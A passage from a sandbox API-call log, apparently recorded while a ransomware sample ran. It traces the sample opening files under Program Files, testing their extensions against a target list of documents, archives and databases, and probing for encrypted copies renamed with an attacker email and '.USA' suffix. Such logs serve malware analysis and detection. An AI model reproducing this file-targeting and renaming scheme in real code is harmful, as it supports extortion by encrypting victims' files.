0x20 [0265.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.139] lstrlenW (lpString=".doc") returned 4 [0265.139] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.139] lstrlenW (lpString=".docx") returned 5 [0265.139] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.139] lstrlenW (lpString=".pdf") returned 4 [0265.139] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.139] lstrlenW (lpString=".xls") returned 4 [0265.139] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.139] lstrlenW (lpString=".xlsx") returned 5 [0265.139] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.139] lstrlenW (lpString=".ppt") returned 4 [0265.139] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.139] lstrlenW (lpString=".zip") returned 4 [0265.139] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.139] lstrlenW (lpString=".rar") returned 4 [0265.139] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.139] lstrlenW (lpString=".bz2") returned 4 [0265.139] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.140] lstrlenW (lpString=".7z") returned 3 [0265.140] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString=".dbf") returned 4 [0265.140] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString=".1cd") returned 4 [0265.140] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString=".jpg") returned 4 [0265.140] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString=".doc") returned 4 [0265.140] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.140] lstrlenW (lpString=".docx") returned 5 [0265.140] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.140] lstrlenW (lpString=".pdf") returned 4 [0265.140] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.140] lstrlenW (lpString=".xls") returned 4 [0265.140] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.140] lstrlenW (lpString=".xlsx") returned 5 [0265.140] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.140] lstrlenW (lpString=".ppt") returned 4 [0265.140] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.140] lstrlenW (lpString=".zip") returned 4 [0265.140] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.140] lstrlenW (lpString=".rar") returned 4 [0265.141] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.141] lstrlenW (lpString=".bz2") returned 4 [0265.141] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.141] lstrlenW (lpString=".7z") returned 3 [0265.141] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.141] lstrlenW (lpString=".dbf") returned 4 [0265.141] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.141] lstrlenW (lpString=".1cd") returned 4 [0265.141] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0265.141] lstrlenW (lpString=".jpg") returned 4 [0265.141] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.141] Sleep (dwMilliseconds=0x64) [0265.273] lstrcmpiW (lpString1=".inc", lpString2=".USA") returned -1 [0265.274] lstrlenW (lpString="oledbvbs.inc") returned 12 [0265.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.370] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=9975) returned 1 [0265.370] CloseHandle (hObject=0x380) returned 1 [0265.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0265.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.371] lstrlenW (lpString=".doc") returned 4 [0265.371] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.371] lstrlenW (lpString=".docx") returned 5 [0265.371] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.371] lstrlenW (lpString=".pdf") returned 4 [0265.371] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.371] lstrlenW (lpString=".xls") returned 4 [0265.371] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.371] lstrlenW (lpString=".xlsx") returned 5 [0265.371] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.371] lstrlenW (lpString=".ppt") returned 4 [0265.371] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.371] lstrlenW (lpString=".zip") returned 4 [0265.371] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.371] lstrlenW (lpString=".rar") returned 4 [0265.371] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.371] lstrlenW (lpString=".bz2") returned 4 [0265.371] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.371] lstrlenW (lpString=".7z") returned 3 [0265.371] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString=".dbf") returned 4 [0265.372] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString=".1cd") returned 4 [0265.372] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString=".jpg") returned 4 [0265.372] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString=".doc") returned 4 [0265.372] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0265.372] lstrlenW (lpString=".docx") returned 5 [0265.372] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0265.372] lstrlenW (lpString=".pdf") returned 4 [0265.372] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString=".xls") returned 4 [0265.372] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString=".xlsx") returned 5 [0265.372] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0265.372] lstrlenW (lpString=".ppt") returned 4 [0265.372] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.372] lstrlenW (lpString=".zip") returned 4 [0265.372] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString=".rar") returned 4 [0265.372] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0265.372] lstrlenW (lpString=".bz2") returned 4 [0265.373] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0265.373] lstrlenW (lpString=".7z") returned 3 [0265.373] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0265.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.373] lstrlenW (lpString=".dbf") returned 4 [0265.373] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0265.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.373] lstrlenW (lpString=".1cd") returned 4 [0265.373] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0265.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0265.373] lstrlenW (lpString=".jpg") returned 4 [0265.373] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0265.373] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.373] lstrlenW (lpString="DissolveAnother.png") returned 19 [0265.373] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.374] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=27935) returned 1 [0265.374] CloseHandle (hObject=0x380) returned 1 [0265.374] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png")) returned 0x20 [0265.374] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.374] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.375] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.375] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.375] lstrlenW (lpString=".doc") returned 4 [0265.375] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.375] lstrlenW (lpString=".docx") returned 5 [0265.375] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1 [0265.375] lstrlenW (lpString=".pdf") returned 4 [0265.375] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.375] lstrlenW (lpString=".xls") returned 4 [0265.375] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.375] lstrlenW (lpString=".xlsx") returned 5 [0265.375] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1 [0265.375] lstrlenW (lpString=".ppt") returned 4 [0265.375] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.375] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.375] lstrlenW (lpString=".zip") returned 4 [0265.375] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.375] lstrlenW (lpString=".rar") returned 4 [0265.375] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.375] lstrlenW (lpString=".bz2") returned 4 [0265.375] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.375] lstrlenW (lpString=".7z") returned 3 [0265.375] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.375] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.375] lstrlenW (lpString=".dbf") returned 4 [0265.375] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.376] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.376] lstrlenW (lpString=".1cd") returned 4 [0265.376] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.376] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.376] lstrlenW (lpString=".jpg") returned 4 [0265.376] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.376] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.376] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.376] lstrlenW (lpString=".doc") returned 4 [0265.376] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.376] lstrlenW (lpString=".docx") returned 5 [0265.376] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1 [0265.376] lstrlenW (lpString=".pdf") returned 4 [0265.376] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.376] lstrlenW (lpString=".xls") returned 4 [0265.376] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.376] lstrlenW (lpString=".xlsx") returned 5 [0265.376] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1 [0265.376] lstrlenW (lpString=".ppt") returned 4 [0265.376] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.376] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.376] lstrlenW (lpString=".zip") returned 4 [0265.376] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.376] lstrlenW (lpString=".rar") returned 4 [0265.376] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.376] lstrlenW (lpString=".bz2") returned 4 [0265.377] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.377] lstrlenW (lpString=".7z") returned 3 [0265.377] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.377] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.377] lstrlenW (lpString=".dbf") returned 4 [0265.377] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.377] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.377] lstrlenW (lpString=".1cd") returned 4 [0265.377] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.377] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0265.377] lstrlenW (lpString=".jpg") returned 4 [0265.377] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.377] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.377] lstrlenW (lpString="DissolveNoise.png") returned 17 [0265.377] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.377] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=751669) returned 1 [0265.377] CloseHandle (hObject=0x380) returned 1 [0265.377] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png")) returned 0x20 [0265.377] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.378] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.378] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.378] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.378] lstrlenW (lpString=".doc") returned 4 [0265.378] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.378] lstrlenW (lpString=".docx") returned 5 [0265.378] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.378] lstrlenW (lpString=".pdf") returned 4 [0265.378] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.378] lstrlenW (lpString=".xls") returned 4 [0265.378] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.378] lstrlenW (lpString=".xlsx") returned 5 [0265.378] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0265.378] lstrlenW (lpString=".ppt") returned 4 [0265.378] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.378] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.378] lstrlenW (lpString=".zip") returned 4 [0265.379] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.379] lstrlenW (lpString=".rar") returned 4 [0265.379] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.379] lstrlenW (lpString=".bz2") returned 4 [0265.379] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString=".7z") returned 3 [0265.379] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.379] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.379] lstrlenW (lpString=".dbf") returned 4 [0265.379] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.379] lstrlenW (lpString=".1cd") returned 4 [0265.379] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.379] lstrlenW (lpString=".jpg") returned 4 [0265.379] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.379] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.379] lstrlenW (lpString=".doc") returned 4 [0265.379] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString=".docx") returned 5 [0265.379] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.379] lstrlenW (lpString=".pdf") returned 4 [0265.379] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.379] lstrlenW (lpString=".xls") returned 4 [0265.380] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.380] lstrlenW (lpString=".xlsx") returned 5 [0265.380] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0265.380] lstrlenW (lpString=".ppt") returned 4 [0265.380] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.380] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.380] lstrlenW (lpString=".zip") returned 4 [0265.380] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.380] lstrlenW (lpString=".rar") returned 4 [0265.380] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.380] lstrlenW (lpString=".bz2") returned 4 [0265.380] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.380] lstrlenW (lpString=".7z") returned 3 [0265.380] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.380] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.380] lstrlenW (lpString=".dbf") returned 4 [0265.380] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.380] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.380] lstrlenW (lpString=".1cd") returned 4 [0265.380] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.380] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0265.380] lstrlenW (lpString=".jpg") returned 4 [0265.380] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.380] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.380] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34 [0265.381] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.382] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=10123) returned 1 [0265.382] CloseHandle (hObject=0x380) returned 1 [0265.382] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0x20 [0265.382] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.382] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.382] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.382] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.382] lstrlenW (lpString=".doc") returned 4 [0265.382] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.382] lstrlenW (lpString=".docx") returned 5 [0265.383] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.383] lstrlenW (lpString=".pdf") returned 4 [0265.383] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.383] lstrlenW (lpString=".xls") returned 4 [0265.383] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.383] lstrlenW (lpString=".xlsx") returned 5 [0265.383] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.383] lstrlenW (lpString=".ppt") returned 4 [0265.383] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.383] lstrlenW (lpString=".zip") returned 4 [0265.383] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.383] lstrlenW (lpString=".rar") returned 4 [0265.383] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.383] lstrlenW (lpString=".bz2") returned 4 [0265.383] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.383] lstrlenW (lpString=".7z") returned 3 [0265.383] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.383] lstrlenW (lpString=".dbf") returned 4 [0265.383] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.383] lstrlenW (lpString=".1cd") returned 4 [0265.383] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.383] lstrlenW (lpString=".jpg") returned 4 [0265.383] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.384] lstrlenW (lpString=".doc") returned 4 [0265.384] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.384] lstrlenW (lpString=".docx") returned 5 [0265.384] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.384] lstrlenW (lpString=".pdf") returned 4 [0265.384] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.384] lstrlenW (lpString=".xls") returned 4 [0265.384] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.384] lstrlenW (lpString=".xlsx") returned 5 [0265.384] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.384] lstrlenW (lpString=".ppt") returned 4 [0265.384] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.384] lstrlenW (lpString=".zip") returned 4 [0265.384] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.384] lstrlenW (lpString=".rar") returned 4 [0265.384] lstrcmpiW (lpString1=".rar", lpString2=".png") 